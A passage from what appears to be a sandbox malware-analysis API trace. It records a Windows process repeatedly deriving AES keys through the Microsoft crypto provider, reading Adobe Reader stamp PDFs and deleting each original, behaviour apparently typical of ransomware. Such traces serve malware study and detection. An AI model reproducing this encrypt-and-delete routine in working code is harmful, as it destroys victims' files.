(normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standard.pdf")) returned 1 [0213.962] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.963] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.963] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.963] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.963] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10873 [0213.963] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.001] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.001] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.001] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.002] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standardbusiness.pdf")) returned 1 [0214.004] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0214.185] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.185] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.185] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.185] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.185] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc4a8 [0214.185] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.198] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.198] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.198] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.199] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\dynamic.pdf")) returned 1 [0214.201] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.202] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.202] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.202] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.202] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9c53 [0214.202] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.211] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.211] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.211] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.212] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\signhere.pdf")) returned 1 [0214.214] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.215] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.215] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.215] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.215] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19c87 [0214.215] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.450] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.450] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.450] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.452] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\standardbusiness.pdf")) returned 1 [0214.528] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0214.564] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.564] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.564] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.564] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.564] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15fc8 [0214.564] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.581] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.582] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.582] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.582] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\dynamic.pdf")) returned 1 [0214.584] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.584] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.584] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.585] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.585] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80f5 [0214.585] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.588] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.588] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.588] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.590] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\faces.pdf")) returned 1 [0214.591] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.591] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.591] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.591] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.591] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb731 [0214.592] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.605] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.605] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.605] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.606] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\pointers.pdf")) returned 1 [0214.608] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.608] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.608] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.608] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.608] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe736 [0214.608] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.614] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.614] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.614] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.615] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\signhere.pdf")) returned 1 [0214.617] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.617] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.617] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.617] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.617] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c4f5 [0214.617] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.641] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.641] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.641] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.643] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\standard.pdf")) returned 1 [0214.644] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.645] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.645] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.645] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.645] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2fe62 [0214.645] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.658] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.658] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.658] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.660] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\standardbusiness.pdf")) returned 1 [0214.667] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0214.667] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.668] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.668] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.668] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.668] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeac7 [0214.668] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.696] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.696] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.696] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.697] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\dynamic.pdf")) returned 1 [0214.707] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.708] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.708] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.708] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.708] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80f5 [0214.708] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.716] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.716] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.716] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.717] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\faces.pdf")) returned 1 [0214.719] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.719] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.719] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.719] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.720] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb731 [0214.720] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.724] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.724] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.724] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.725] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\pointers.pdf")) returned 1 [0214.727] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.727] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.727] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.727] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.727] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa118 [0214.727] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.752] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.752] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.752] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.753] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\signhere.pdf")) returned 1 [0214.754] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.755] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.755] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.755] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.755] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c4f5 [0214.755] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.763] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.763] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.763] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.764] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\standard.pdf")) returned 1 [0214.766] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.766] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.766] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.766] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.766] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ac4e [0214.767] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.793] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.793] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.794] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.795] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\standardbusiness.pdf")) returned 1 [0214.818] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0214.819] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.819] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.820] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.820] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.820] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa85d [0214.820] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.832] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.832] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.832] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.833] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\dynamic.pdf")) returned 1 [0214.834] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.835] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.835] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.835] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.835] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80f5 [0214.835] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.872] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.872] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.872] 